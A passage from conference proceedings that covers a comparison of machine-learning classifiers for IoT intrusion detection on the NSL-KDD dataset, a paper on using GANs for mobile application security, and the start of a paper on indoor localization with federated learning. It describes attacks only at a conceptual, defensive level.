we used the NSL-KDD dataset (Network Security Laboratory - Knowledge Discovery in Databases). The main objective behind this comparison is to be aware of the most efficient Machine Learning algorithms in intrusion detection to put them as the main building blocks in the future modules of Intrusion Detection Systems. The results obtained show that Random Forest, J48, and Decision Table are the most efficient algorithms for Accuracy (respectively 99.92%, 99.72%, and 99.49%), Detection Rate (respectively 99.90%, 99.77%, and 99.29%), and False Alarm Rate (respectively 0.05%, 0.34%, and 0.27%). Therefore, these three algorithms can be considered a good basis for future solutions of intrusion detection systems to increase the security of Internet of Things. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 132–144, 2023. https://doi.org/10.1007/978-3-031-35251-5_12

Intrusion Detection Systems in Internet of Things

133

Keywords: Intrusion Detection System · Internet of Things · Machine Learning

1 Introduction Internet of Things is considered one of the modern technologies that attract a significant amount of attention among researchers partly due to the fact that this technology has become an essential part of most fields like the medical field, the industrial field, the agricultural field, etc..... The Internet of Things refers to the ability of objects to communicate with one another via the Internet. Despite the substantial progress in the use of this technology, it still suffers from some problems that hinder its use in sensitive areas. A cyberattack against the Internet of Things is one such problem. Cybersecurity researchers are working on several paths to propose and implement security solutions for IoT networks and data exchanged via these networks, including Blockchain [1], Cryptography [2], and Intrusion Detection Systems as well [3–5] which are our subject of research. Over the past few years, the Internet of Things has intertwined with other sciences such as data science, big data, and artificial intelligence. As a result, the search for smarter security solutions becomes a necessity, as solutions based on Machine Learning techniques. In this work, we will address “Intrusion Detection Systems based on Machine Learning Algorithms” as a solution to increase the security level of the Internet of Things. The rest of this work is organized as follows: Sect. 2 consists of a brief overview of the main terms of our research. Then, in Sect. 3, we will present the algorithms compared, the comparison parameters, and the Dataset used. The experiment, results, and discussion of the comparison have been stated in Sect. 4 while a conclusion of our work will be presented in Sect. 5 respectively.

2 Relevant Terms In this part, we will briefly present the main terms in our work. 2.1 Intrusion Detection System Intrusion Detection System: It is a security tool that monitors and analyzes network traffic for suspicious activity and alerts the network administrator to notify when such activity is discovered. There are two categories of IDS: • Network Intrusion Detection System (NIDS) This type is used to analyze and monitor network traffic and it can be monitored throughout the network or installed in a specific location to monitor part of the network.

134

H. Rachid et al.

• Host Intrusion Detection System (HIDS) It refers to a system that monitors and analyzes a computing infrastructure on which it is installed to detect an intrusion. According to the intrusion detection technique, there are two types of IDSs: • Signature Based IDS This type is signature-based, i.e., each attack is detected using the pattern (Signature) that already exists in an attack signature database [6]. However, it can detect only attacks recognized by their signatures. • Anomaly Based IDS This type is rule-based rather than pattern-based, i.e., the IDS defines the normal behavior of the system being monitored and therefore any activity different from the normal behavior will be considered an intrusion [6]. The strong point of this type is its ability to detect new attacks. 2.2 Internet of Things The Internet of Things refers to the interconnection of objects via the Internet network using electronic chips or sensors. Thanks to the concept of the Internet of Things, several objects (by consequences of the tasks) can be controlled remotely. For the IoT architecture, there are several architectures. However, the most common is the three-layer architecture [7, 8]: the perception layer, the network layer, and the application layer. • The perception layer It is the physical layer and its key role is to detect, collect and process data. This layer has sensors by which data are collected. • The network layer It is also called the transmission layer. It is the intermediate layer between the perception layer and the application layer, and it is responsible for transmitting data and determining the optimal routes for transmission. This layer has most network devices such as Hub, Switch, and Router. • Application layer It is also known as the business layer. It is the layer that provides services to users of IoT applications. This is where we can talk about intelligent environments. 2.3 Machine Learning Machine learning: It is an artificial intelligence technology that allows computers to learn without being explicitly programmed. The different machine learning algorithms can be categorized into two major types: Supervised learning and Unsupervised learning [9].

Intrusion Detection Systems in Internet of Things

135

• Supervised Learning It is a learning system in which the algorithm generates a function that maps the inputs to the desired outputs. In this type, machines are trained using labeled data. The labeled data means some of the input data is already tagged with the proper output. • Unsupervised Learning. It is a fundamental type with supervised learning. In this type, however, the system has only examples but no labels. Unsupervised learning is mainly used in the clustering domain.

3 Preliminary 3.1 The Algorithms Used • Support Vector Machine Algorithm (SVM) Support Vector Machine, abbreviated as SVM, is a supervised learning model invented by Boser, Guyon, and Vapnik in the year 1992 in COLT-92 [10]. SVM belongs to the class of linear classifiers that use a linear separation of data, that is, SVM can solve the classification problem. However, it can be used also to solve another problem of machine learning, which is the problem of regression. SVM treats two important points. The first is to identify the category/ class to which the sample data will belong, and the problem is referred to as a classification problem. The second tip is the prediction of the numerical value of a variable, and this problem is the regression problem. SVM in a formal way is defined by a hyperplane, which separates data into classes. This hyperplane is determined by the number of support vectors, and the support vectors are a subset of learning data to define the boundary between the data classes. • J48 Algorithm J48 Algorithm is a supervised learning technique of machine learning. it appeared in 1975 by J. Ross Quinlan in his book “MAchine Learning” in which the decision tree analysis model is presented. His first algorithm for creating a decision tree is called ID (Iterative Dichotomiser). This algorithm consists of using a decision tree as a predictive model. Originally, this method is intended to predict a numerical value such as age, average, price, or other. However, it can be used as well to solve the problem of classification, that is to say, the prediction of the class in which a data sampling belongs. To solve a given problem, J48 uses a tree representation. In this representation, each node represents an attribute, and each leaf node corresponds to a class tag. • Decision Table Algorithm (DT) Decision Table: It is a machine learning algorithm classification problem that allows to easily model a set of choices. Decision tables are a good way to describe requirements when multiple business rules interact. By using decision tables, it becomes easier for the requirements specialist to write requirements that cover all conditions. With respect to the tester, it becomes easier for them to write complete test cases.

136

H. Rachid et al.

• Random Forest Algorithm (RF) Random Forest: It is a classification algorithm in the field of machine learning. It is first proposed by Ho in 1995 and later by Leo Breiman and Adéle Culter in 2001. Leo Breiman defined this algorithm as follows: "Random Forest" are a combination of tree predictors such that each tree depends on the values of a random vector sampled independently and with the same distribution for all trees in the forest". This algorithm creates a forest with several trees. More the number of trees, more robust is your forest. The greater number of trees in the forest provides higher accuracy results. • Naive Bayes Algorithm (NB) Naive Bayes: It is a classification algorithm based on the science of probability, and more precisely on the Bayes theorem. It appeared in the 1960s but not on this name. This algorithm is one of the unsupervised algorithms of machine learning, and it is based on an assumption that "the features of measurement are independent of each other ". Mathematically, the NB algorithm based on the Bayes theorem is defined by the following relation: P(c|x) =

P(x|c)P(c) , P(x)

Above, P (c|x): The posterior probability of class c according to the attribute x. P (x|c): Probability of the attribute x knowing it belongs to the class c. P (c): The prior probability of class c. P (x): The prior probability of attribute x. 3.2 The Parameters Used Before talking about evaluation parameters, we must first understand the confusion matrix that is defined below: The parameters defined by this matrix are as follows: TP: normal packet predicted as a normal packet. FP: normal packet predicted as an abnormal packet. FN: abnormal packet predicted as a normal packet. TN: abnormal packet predicted as an abnormal packet. These parameters allow us to define the evaluation parameters, and we will use the following four parameters to evaluate our practical work: • Time Time is a necessary condition in Internet of Things security solutions, so the learning and testing time of IDS must be minimal. For this reason, time is taken as a parameter for evaluating the performance of the algorithms studied.

Intrusion Detection Systems in Internet of Things

137

• Accuracy The ratio between the correct forecast records and the complete records is calculated by the following relation: Accuracy =

TP + TN TP + TN + FP + FN

• Detection rate

DR =

TP TP + FN

• False Alarm rate

FAR =

FP FP + TN

3.3 The Dataset Used In this work, we will use the dataset called NSL-KDD, which extracts from another dataset called KDD cup 99. The abbreviation NSL stands for Network Security Laboratory, and KDD stands for Knowledge Discovery in Databases. First, KDD cup 99 is considered the first dataset used in the intrusion detection domain. This dataset is built from the IDS DARPA’98 program database. The main purpose of creating this dataset is to evaluate the different intrusion detection methods on the network to distinguish normal connections from abnormal connections including intrusions, attacks, or malicious activities. NSL-KDD is a KDD upgrade version of Cup 99 and is created by removing all existing redundancies in KDD cup 99. The NSL-KDD dataset contains 41 attributes that can be divided into 4 categories as the following table shows. Regarding attacks, the NSL-KDD dataset contains 24 types of attacks that are themselves divided into 4 categories, and the table below presents a small description as well as the types of attacks of each category [11].

4 Experiment 4.1 Experiment Setup The empirical experiment runs in an Intel Core™ i2 CPU @ 2.40 GHz computer with 4.00 GB RAM running Windows 7. The selected algorithms are tested using the weka tool. Waikato Environment for Knowledge Analysis, abbreviated as Weka, is a machine learning and data mining software written in Java, developed at the University of Waikato in New Zealand [12].

138

H. Rachid et al.

4.2 Results and Discussion According to the experiment that we implemented using the machine learning tool weka, we found the following results: • Training Time Table 4 shows the results concerning the training time of each algorithm among the used algorithms (Tables 1, 2 and 3): Table 1. Matrix Confusion Predicted Actual

Normal

Attack

Normal

TP

FP

Attack

FN

TN

Table 2. Features of NSL-KDD Dataset Basic Features

Content Features

Time-based traffic features

Host-based traffic features

1-duration 2-protocol_type 3 Service 4-src_bytes 5-dst_bytes 6-flag 7-land 8-wrong_fragment 9-pressing

10) hot 11-num_failed_logins 12-logged_in 13-num_compromised 14-root_shell 15-su_attempted 16-num_root 17-num_file_creations 18-num_shells 19-num_access_files 20- num_outbound_cmds 21-is_hot_login 22-is_guest_login

23-Count 24-serror_rate 25-rerror_rate 26-same_srv_rate 27-diff_srv_rate 28-srv_count 29-srv_serror_rate 30-srv_rerror_rate 31-srv_diff_host_rate

32-dst_host_count 33-dst_host_srv_count 34-dst_host_same_srv_rate 35-dst_host_diff_srv_rate 36-dst_host_same_src_port_rate 37-dst_host_srv_diff_host_rate 38-dst_host_serror_rate 39-dst_host_srv_serror_rate 40-dst_host_rerror_rate 41-dst_host_srv_rerror_rate

Intrusion Detection Systems in Internet of Things

139

Table 3. Attacks categories in NSL-KDD dataset Categories Description

Types of attacks

DoS

Denial of Service Attack (DoS): It is a Back, Land, Neptune, Pod, Smurf, type of attack based on the creation of Teardrop, Apache2, computational resources or memory Udpstorm, Processtable, Worm resources to prevent the target system to handle legitimate requests or prevent the user to access the system

U2R

User to Root Attack (U2R): It is a type Buffer_overflow, Loadmodule, Rootkit, of attack in which the attacker tries Perl, Sqlattack, Xterm, Ps to access a normal user account and then tries to exploit one of the vulnerabilities in the system to gain access

R2L

Remote To Local Attack (R2L): in this type of attack, the attacker can send packets to a machine victim, but this attacker does not have an account on the system. Then, the attacker tried to exploit a vulnerability to gain access as a user of this system

Guess_Password, Ftp_write, Imap, Phf, Multihop, Warezmaster, Warezclient, Spy, Xlock, Xsnoop, Snmpguess, Snmpgetattack, Httptunnel, Sendmail, Named

Prob

In this category of attack, the attacker tries to collect information about a network to analyze security vulnerabilities

Satan, Ipsweep, Nmap, Portsweep, Mscan, Saint

Table 4. Training Time Algorithms

Training Time (second)

SVM

2472.46

Random Forest Naive Bayes J48 Decision Table

142.54 1.64 45.80 140.87

Figure 1 presents the training time results for each algorithm: • Accuracy Table 5 shows the results of accuracy of each algorithm among the used algorithms: Figure 2 presents the accuracy results for each algorithm:

140

H. Rachid et al.

Fig. 1. Training Time

Table 5. Accuracy Algorithms

Accuracy (%)

SVM

97.50

Random Forest

99.92

Naive Bayes

90.60

J48

99.72

Decision Table

99.49

• Detection Rate Table 6 shows the results of the Detection Rate of each algorithm among the used algorithms: Figure 3 presents the Detection Rate results for each algorithm:

Intrusion Detection Systems in Internet of Things

141

Fig. 2. Accuracy

Table 6. Detection rate Algorithms

Detection rate (%)

SVM

96.76

Random Forest

99.90

Naive Bayes

89.14

J48

99.77

Decision Table

99.29

• False Alarm Rate Table 7 shows the results of False Alarm Rate of each algorithm among the used algorithms: Figure 4 presents the False Alarm Rate results for each algorithm: In our comparison, we find from the training time perspective that the Naive Bayes algorithm is the fastest in learning followed by J48 which has also a good training time. However, we note that SVM algorithm is the slowest. On the other hand, in the point of precision, the algorithm Random Forest is the best algorithm among the compared algorithms. J48 and Decision Table also have good accuracy. In addition, since our comparison between the algorithms is done in the order of the intrusion detection, and we know that an IDS is efficient only if it has a good Detection rate and a low False Alarm rate. So, in these two parameters, we notice that Random

142

H. Rachid et al.

Fig. 3. Detection rate

Table 7. False Alarm rate Algorithms

False Alarm rate (%)

SVM

1.60

Random Forest

0.05

Naive Bayes

7.51

J48

0.34

Decision Table

0.27

Forest, J48, and Decision Table are the best. On the other hand, the two algorithms SVM and Naive Bayes have low Detection Rate and a high False Alarm Rate. We can see that Random Forest, J48, and Decision Table are powerful algorithms in intrusion detection even if the training time for Random Forest and Decision Table is not well optimized. However, the other two algorithms SVM and Naive Bayes are weak algorithms in intrusion detection either in Training time or in other parameters. Comparing our work with previous works, we find that Nanak Chand and Al [13] present a comparison between SVM and the other algorithms in intrusion detection, and they find that SVM alone is not efficient compared to the use of SVM with other algorithms. The work [14], shows that J48 is a powerful algorithm in intrusion detection though its training time is not efficient compared to other algorithms. In [15] also, the proposed comparison shows that Random Forest and J48 have good results in both accuracy and Training time.

Intrusion Detection Systems in Internet of Things

143

Fig. 4. False Alarm rate

5 Conclusion In this work, we presented a practical comparison between the machine learning algorithms in order of intrusion detection using the weka tool, and the result obtained shows that the three algorithms Random, J48, and Decision Table are powerful in the context of intrusion detection and can be used in IDSs solutions to increase the security of IoT networks.

References 1. Chentouf, F.Z., Bouchkaren, S.: Blockchain for Cybersecurity in IoT (2021) 2. Dhanda, S.S., Singh, B., Jindal, P.: Lightweight Cryptography: A Solution to Secure IoT (2020) 3. Boujrad, M., Lazaar, S., Hassine, M.: Performance Assessment of Open Source IDS for improving IoT Architecture Security implemented on WBANs (2020) 4. Raza, S., Wallgren, L., Voigt, T.: SVELTE: Real-time intrusion detection in the Internet of Things (2013) 5. Wang, H., Gu, J., Wang, S.: An effective intrusion detection framework based on SVM with feature augmentation (2017) 6. Fenanir, S., Semchedine, F., Baadache, A.: A Machine Learning-Based Lightweight Intrusion Detection System for the Internet of Things (2015) 7. Sethi, P., Sarangi, S.R.: Internet of Things: Architectures, Protocols, and Applications (2017) 8. Santos, L., Rabadão, C., Gonçalves, R.: Intrusion Detection Systems in Internet of Things A literature review (2018) 9. Kr. Sharma, R., Kalita, H.K., Borah, P.: Analysis of Machine Learning Techniques Based Intrusion Detection Systems (2016) 10. Evgeniou, T., Pontil, M.: Workshop on Support Vector Machines: Theory and Applications (2001)

144

H. Rachid et al.

11. Dhanabal, L., Shantharajah, S.P.: A Study on NSL-KDD Dataset for Intrusion Detection System Based on Classification Algorithms (2015) 12. Weka Tool. https://www.cs.waikato.ac.nz/ml/weka 13. Chand, N., Mishray, P., Rama Krishna, C., Pilliy, E.S., Govil, M.C.: A Comparative Analysis of SVM and its Stacking with other Classification Algorithm for Intrusion Detection (2016) 14. Nawir, M., Amir, A., Yaakob, N., Lynn, O.B.: Effective and efficient network anomaly detection system using machine learning algorithm (2019) 15. Choudhury, S., Bhowal, A.: Comparative Analysis of Machine Learning Algorithms along with Classifiers for Network Intrusion Detection (2015)

Generative Adversarial Networks for IoT Devices and Mobile Applications Security Akram Chhaybi1(B) , Saiida Lazaar1 , and Mohammed Hassine2 1

Mathematics, Computer Sciences and Applications ERMIA TEAM, ENSA of Tangier UAE University-Morocco, Tangier, Morocco [email protected], [email protected] 2 Tisalabs, Dublin, Ireland [email protected]

Abstract. With the rise in popularity of the Internet of Things (IoT) devices and smartphones, the number of mobile applications (apps) is rapidly increasing due to many factors like the low price of smartphones contributing significantly to the high acquisition rate, the capability for consumers to download and install a vast number of applications, tools etc. However, mobile applications present a whole world of security vulnerabilities, making them a prime target for hackers to spread malwares rapidly on smartphones and execute a variety of attacks. Therefore, mobile applications vulnerability detection and prevention solutions are becoming more advanced based on cover preventative techniques like static and dynamic analysis of the mobile applications and effective detection that uses new models of machine and deep learning techniques such as Generative Adversarial Networks (GANs) which are well suited for this type of problems. In this work, we will discuss the top ten mobile applications vulnerabilities with a focus on the main security challenges facing smartphone apps. We will present some solutions for securing the mobile applications based on GANs.

Keywords: Mobile Applications Detection · Prevention Security

1

· IoT · GANs · Vulnerabilities ·

Introduction

Mobile phones and Internet of Things have increasingly merged into all aspects of social life from financial transactions, email, health monitoring, and social networking to becoming an essential component of people’s work and daily lives. As a result, they have radically changed people’s productivity and living habits. According to a Statista study [1] the number of smartphones users from 2016 to 2021 increased twice, where in 2016, we had 3.668 billion users, and by the end of 2021, the number reached 6.567 billion users. As a result, the number of threats and vulnerabilities for mobile applications is increasing dramatically, last year alone, there were almost twice as many new varieties of malware infecting mobile c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 145–151, 2023. https://doi.org/10.1007/978-3-031-35251-5_13

146

A. Chhaybi et al.

devices as there were in 2019 [2] which can breach the communication’s security, authentication and integrity thus giving unauthorized access. Furthermore, many attacks could breach the security system and open backdoors bypassing the defense mechanism [4]. Comparing smartphone devices, Android has a more significant percentage of malware with 47.15 per cent; Android devices had the highest proportion, followed by Windows with 36 per cent, Internet of Things (IoT) with 16 per cent, and iPhone with less than 1 per cent [5]. Many reasons have made the android platform the first target by hackers, firstly Android is an open-source operation system, which gives hackers more information about the system and therefore the ability to create applications such as Opera Mobile Store, Panda app, Baidu app store and others. In addition, personal information that is frequently saved on smartphones, mainly as more people use their cellphones to conduct financial activities like online banking and shopping that uses specific data, might be sensitive. Therefore, it may bring in much money for hackers, and most consumers believe that smartphones are just mobile phones with a range of communications and entertainment software pre-installed and not being aware that their cellphones are effectively portable computers that are subject to cyber-attacks [7]. This problematic led to the development of new mechanisms of protection for mobile applications. Starting with mobile malware detection solutions, this solution knew a big wave of improvement by implementing machine and deep learning algorithms that helped detect malware and protect users [6]. These malicious applications will get permissions from users to gain access to contacts, calls, pictures, and any valuable and sensitive data for the attacker. Therefore, some solutions use different technologies based on machine and deep learning to detect malicious application based on requested permissions [8]. Our work aims to use Generative Adversarial Networks (GANs) as a solution for protecting mobile applications. This paper is structured as follow: In Sect. 2, we discuss the security challenges and mobile application vulnerabilities. Section 3 describes the proposed solutions that use GANs as a technique to secure mobile applications. We conclude this article with a conclusion and some perspectives for a future work.

2

Mobile Applications’ Vulnerabilities

In this section, we discuss the main mobile applications vulnerabilities and security challenges based on OWASP mobile Top 10 [3] and its extension. The OWASP list presented hereafter is devoted to the security of data storage and communications; the OWASP list includes also confidentiality and authentication issues. There is a range of challenges threatening the security of mobile apps that are reported by many organizations and researchers, one of those foundations is the Open Web Application Security Project (OWSAP). The latter lists every year the most mobile applications issues and challenges that can help developers frame their projects in a set of conditions that provide security for the user. Starting with:

GANs for IoT Devices and Mobile Application Security

147

– The security of data storage: When development teams presume that users or malware would not have access to a mobile device’s file system and, as a result, sensitive information in data-stores on the device, they create insecure data storage vulnerabilities. Access to file systems is simple on mobile phones. The user or virus should be expected to investigate sensitive data repositories. This type of issue knows many threats and vulnerabilities that we can summarize into two categories; physical threats and software threats. – In the physical threats: we can find many attacks that gain access to the data stored in the mobile phone, such as the Evil maid attack, cold Boot attack and row hammer attack [5]. Each attack depends on specific the scenario and specific conditions. The software threats are mostly related to malware attacks. Sets of research focus on detection malware attacks in mobile phones [6] using different techniques [7]. – Communication security: Network traffic is typically not protected by mobile applications. They can use SSL/TLS protocols for authentication but not for anything else, which discrepancy puts data and session IDs in danger of intercepting. SSL and its successor TLS protect the message from MITM (Man In The Middle) attacks by encrypting network messages. It is vital to obtain certificates containing public keys from the server to achieve this goal. The MITM attack happens when the attacker interferes with the communication between the client and the server. This can lead to intercepting the message sent by the client and transmitting it to the server. It may also intercept or manipulate messages sent by the server and impersonate the server to connect with the client. We can find such vulnerabilities in static code analysis like X509TrustManager, HostNameVerifier, WebViewClient sslError and X509HostnameVerifier [8]. – Insecure authentication: Insecure authentication happens when the system cannot identify the user; once the attackers understand the authentication scheme, they try to fake or bypass the authentication requests to the server. There are four authentication approaches; Knowledge-based Authentication, Physiological Biometrics-based Authentication, Behavioral Biometrics-based Authentication and Two/multi-factor Authentication [9]. The most used method is Knowledge-based Authentication, where the user uses a secret sequence of digits or letters to get identified in the system. However, the authentication method used, the attacker can find his way to gain access to the user’s private information and pass the authentication system using many attacks. The phishing attack is one of them, and the attacker sends fake emails, SMS, voice calls and web pages to steal the sensitive data [10]. – Weak Cryptography: A major problem in mobile apps that use encryption is insufficient cryptography or unsafe cryptography usage. The prospective hacker is able to restore the encrypted code or sensitive data to its original unencrypted form due to poor encryption techniques or weaknesses within the encryption process as key management, type of algorithm used in the system. There are various of methodologies that the attacker can apply to decrypt the data on the smart phone, by decompiling the source of code of

148

A. Chhaybi et al.

the application using specific tools as JEB Decompiler, IDA pro, and others for android phones [11], then they can find the backup location file and do a reverse engineering to it.

3

Solutions for Protecting Mobile Applications

In this section, we present some technical solutions that can help increase the security of mobile applications at both hardware and software levels. 3.1

Hardware Level Protections

When we talk about the hardware part, we mean the security of mobile devices that should be considered when stealing or losing the mobile, especially for mobile applications that uses sensitive user data to provide their services in healthcare, e-commerce, and any services that requires permissions to gain access to the client’s information. In the list below, we will discuss the main solutions improving hardware security in mobile devices. – Screen Lock Authentication: The first step offers security for our mobile devices. In general, we can classify the mobile device screen touch methods into five classes: PIN-based authentication, biometric-based authentication, pattern or gesture-based authentication, graphical password authentication, and other authentication methods [12]. Each of those methods provides a level of security that can be vulnerable in certain conditions. However, we still have users who do not use any of the previous methods or use an easy PIN of four digits to get authentication. For the mobile applications that ask to use the sensitive data of the clients, they have to force the client to use a suitable method of screen touch authentication, for example, the biometric method that uses physical or human characteristics to identify a person to grant access to systems, devices or data. This technique can have many models to serve the application’s needs [13]. – Internal Data Storage: This level of security is essential for the applications that store the user’s data in the mobile device, such as cookies, images, passwords, and any information that concerns the client. When sensitive data is not correctly protected by the app continuously keeping it, it becomes susceptible. The software may be able to save data in various locations, including on the device or an external SD card. Many applications indeed encrypt the data on mobile phones, but several forensics techniques can extract the encrypted data from the mobile devices [14]. Therefore, the application should avoid the internal storage of sensitive data and send the collected data to the cloud using a suitable encryption mechanism that considers the key management, the energy of the small devices and other challenges.

GANs for IoT Devices and Mobile Application Security

3.2

149

Generative Adversarial Networks for Software Level Protection

This section aims to present the Generative Adversarial Networks (GANs) as an important solution for mobile application security. This technology is an unsupervised machine learning approach invented by Lan Goodfellow [15] in 2014 at the Neural Information Processing Systems (NIPS). GANs consists of two neural networks, one called a generator, and the other is the discriminator. The role of the generator is to create new data and to send it to a discriminator that verifies if the data is fake or not, and the process keeps running until the generator can recreate data, similar to the original one. The flowchart on Fig. 1 illustrates the GAN model.

Fig. 1. The GAN flowchart.

The GAN creates new data from a random input, sends it to the discriminator; the discriminator compares the generated data with the accurate data and uses the results to update the generator. The generator’s goal is to train itself to generate fake data that is similar to the real one, while the discriminator provides a classification between fake and accurate data as maximum possible. Otherwise, Generative adversarial networks can improve the security of smartphones against mobile attacks by combing this technology with multiple techniques like dynamic and static analyses, signatures, and classifier attacks. – The dynamic analyses require analyzing the code during the execution, like looking at the network traffic, the third part that the application communicates with, and the kernel. Dynamic code analysis can show many vulnerabilities such as buffer overflow and null pointers. During the static analyses, the source code is reviewed to make sure that the security protection is implemented well [5]. The GAN can use the features extracted from the dynamic

150

A. Chhaybi et al.

and static analyses to generate new adversarial attacks and use them to test the security of mobile applications. – We can generate new malware signatures to improve the security of mobile applications against malware. The signatures ensure that the software that the user is downloading is actual, especially for Android smartphones, which control more than 85% of the market. The signatures are widely used to detect mobile malware because they are easy to manipulate among researchers. The generated signatures are similar to the dataset but not the same. – The classifiers are models based on machine/deep learning to classify the malware or attacks in general The classifiers use many methods and features to classify if an application is a malware or not. However, they are vulnerable to new attacks because the attackers become aware of the classifier and its parameters. The GAN model can also attack the classifiers by creating new adversarial malicious that will be undetected by the classifier.

4

Conclusion and Perspectives

Generative Adversarial Networks (GANs) present a great potential to be implemented in a variety of applications to improve the security of mobile applications. In this work, we discussed the top ten mobile applications vulnerabilities. Focusing on the main security challenges facing smartphone apps. We presented some solutions targeting the security of the mobile applications based on the Generative Adversarial Networks starting with the dynamic analyses, which includes launching the program and testing it, and finding runtime errors. The static studies involves looking at the code during the development cycle to identify potential flaws throughout both design and implementation phases such as permissions, libraries used, etc. Every application in the app store is identified by its unique ID signature which is used to differentiate it from malwares. In order to train GAN models effectively we propose to use this technique to create new signatures which can then be used to improve our model. As an outlook for future research, we will focus on implementing GANs in smartphones to resolve security challenges: – GAN implementation for mobile application security based on Battery Life and power consumption. – Comparison of GANs Models and their loss functions. – Lightweight mobile application security solution based on GANs

References 1. Smartphone users 2026, Statista. https://www.statista.com/statistics/330695/ number-of-smartphone-users-worldwide. Accessed Nov. 23 2021 2. Chee, K.: Global increase in mobile malware but smartphone security lax in S’pore. The Straits Times, Singapore, Jul. 05, 2021. https://www.straitstimes.com/tech/ tech-news/global-increase-in-mobile-malware-but-smartphone-security-lax-here. Accessed: Nov. 23, 2021

GANs for IoT Devices and Mobile Application Security

151

3. OWASP Mobile Top 10. https://owasp.org/www-project-mobile-top-10/. Accessed Nov. 30, 2021 4. Nokia Threat Intelligence Report: Network Security, vol. 2018, no. 12, p. 4, Dec. 2018 10.1016/S1353-4858(18)30122–3 5. Altuwaijri, H., Ghouzali, S.: Android data storage security: a review. J. King Saud Univ. - Comput. Inf. Sci. 32(5), 543–552 (2020). https://doi.org/10.1016/j.jksuci. 2018.07.00 6. Mohamad Arif, J., Ab Razak, M.F., Tuan Mat, S.R., Awang, S., Ismail, N.S.N., Firdaus, A.: Android mobile malware detection using fuzzy AHP. J. Inf. Secur. Appl. 61, 102929 (2021). https://doi.org/10.1016/j.jisa.2021.102929 7. Fereidooni, H., Conti, M., Yao, D., Sperduti, A.: ANASTASIA: ANdroid mAlware detection using STatic analySIs of Applications. In: 2016: Mobility and Security (NTMS), 8th IFIP International Conference on New Technologies 2016, Larnaca, pp. 1–5, Nov. 2016. https://doi.org/10.1109/NTMS.2016.7792435 8. Wang, Y., et al.: Identifying vulnerabilities of SSL/TLS certificate verification in Android apps with static and dynamic analysis. J. Syst. Softw. 167, 110609 (2020). https://doi.org/10.1016/j.jss.2020.110609 9. Wang, C., Wang, Y., Chen, Y., Liu, H., Liu, J.: User authentication on mobile devices: approaches, threats and trends. Comput. Netw. 170, 107118 (2020). https://doi.org/10.1016/j.comnet.2020.107118 10. Goel, D., Jain, A.K.: Mobile phishing attacks and defence mechanisms: State of art and open research challenges. Comput. Secur. 73, 519–544 (2018). https://doi. org/10.1016/j.cose.2017.12.006 11. Park, M., Yi, O., Kim, J.: A methodology for the decryption of encrypted smartphone backup data on android platform: a case study on the latest samsung smartphone backup system. Forensic Sci. Int. Digital Investigation 35, 301026 (2020). https://doi.org/10.1016/j.fsidi.2020.301026 12. Ibrahim, T.M., et al.: Recent advances in mobile touch screen security authentication methods: a systematic literature review. Comput. Secur. 85, 1–24 (2019). https://doi.org/10.1016/j.cose.2019.04.008 13. Abazi, B., Qehaja, B., Hajrizi, E.: Application of biometric models of authentication in mobile equipment. IFAC-PapersOnLine 52(25), 543–546 (2019). https:// doi.org/10.1016/j.ifacol.2019.12.602 14. Fukami, A., Stoykova, R., Geradts, Z.: A new model for forensic data extraction from encrypted mobile devices. Forensic Sci. Int. Digital Investigation 38, 301169 (2021). https://doi.org/10.1016/j.fsidi.2021.301169 15. Goodfellow, I., et al.: Generative Adversarial Nets. Advances in Neural Information Processing Systems, p. 9, 2672–2680

The Indoor Localization System Based on Federated Learning and RSS Using UWB-OFDM Youssef Ibnatta1,2(B) , Mohammed Khaldoun1,2 , and Mohammed Sadik1,2 1 Department of Electrical Engineering, Hassan II University, Casablanca, Morocco

{youssef.ibnatta,m.khaldoun,m.sadik}@ensem.ac.ma 2 NEST Research Group ENSEM, Hassan II University, Casablanca, Morocco

Abstract. Nowadays, indoor positioning is an attractive topic because it allows putting in the customer’s position several services that facilitate indoor life. Otherwise, the indoor positioning systems suffer from multiple path problems that reduce the quality of the systems. In this paper, we try to solve the problem through its decentralization. We propose a new localization method based on federated learning and RSS received signal strength mathematical model using UWB-OFDM. The mathematical model of RSS received signal strengths is used to construct the offline database of RSSI. Next, federated learning uses the database to estimate position information by applying the neural network as a machine that relates signal strength to position coordinates. Our goal is to show how a decentralized method can limit the effect of the NLOS problem and also demonstrate that the quality of federated learning is strongly related to the data. For this reason, we used four databases, one built by our approach and the others based on different technologies. In this paper, we used random data to evaluate the proposed method. In the simulation part, we use three platforms MATLAB, MySQL, and Java interface. The proposed average approach error is 148.9 cm in the case of 10 users with five repetition rounds. Keywords: RSS · Federated learning · RMSE · UWB · OFDM · BLE · Wi-Fi

1 Introduction With the increasing number of smartphone users, the demand for indoor localization tools is growing. Indoor localization systems facilitate the life of people indoors by providing navigation, guidance, and other services. This tool is a motivating topic for research as it applies several available technologies such as image processing, inertial sensor measurements, and radio band to detect the users’ steps. GPS is the most usable positioning tool outdoors however its signals had blocked by walls, which limits their use indoors. For this reason, researchers have decided to replace GPS with other effective indoor positioning tools. Indoor positioning systems are composed of three main parts:

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 152–167, 2023. https://doi.org/10.1007/978-3-031-35251-5_14

The Indoor Localization System

153

– Physical positioning layer: is the hardware-software part that ensures the communication between the system elements. Then it prepares the positioning information for the algorithm, which estimates the client’s position. – The position estimation algorithm: is the software part of the system that consists of estimating the user’s positions by using mathematical methods based on some parameters such as power, time, angle of deviation, phase variation, magnetic flux, etc. The algorithm can estimate the positions by calculating the variation of these parameters between the transmitter and the receiver. – Optimization algorithm: This tool optimizes the basic algorithm by using mathematical methods either deterministic or probabilistic. This tool can reduce the error obtained by the basic algorithm. Currently, indoor positioning algorithms are classified into six categories: – – – – – –

Received Signal Strength (RSS) approaches based on Wi-Fi or Bluetooth Pedestrian Dead Reckoning (PDR) or Inertial Measurement Unit (IMU) approaches Triangulation and Trilateration-based approaches Tag/Reader identifications approaches Localization by Vision Multimodal localization The most usable localization infrastructures are the following:

– – – – – – – –

Wi-Fi UWB Bluetooth /NFC ZigBee Inertial sensors Camera RFID Laser sensor

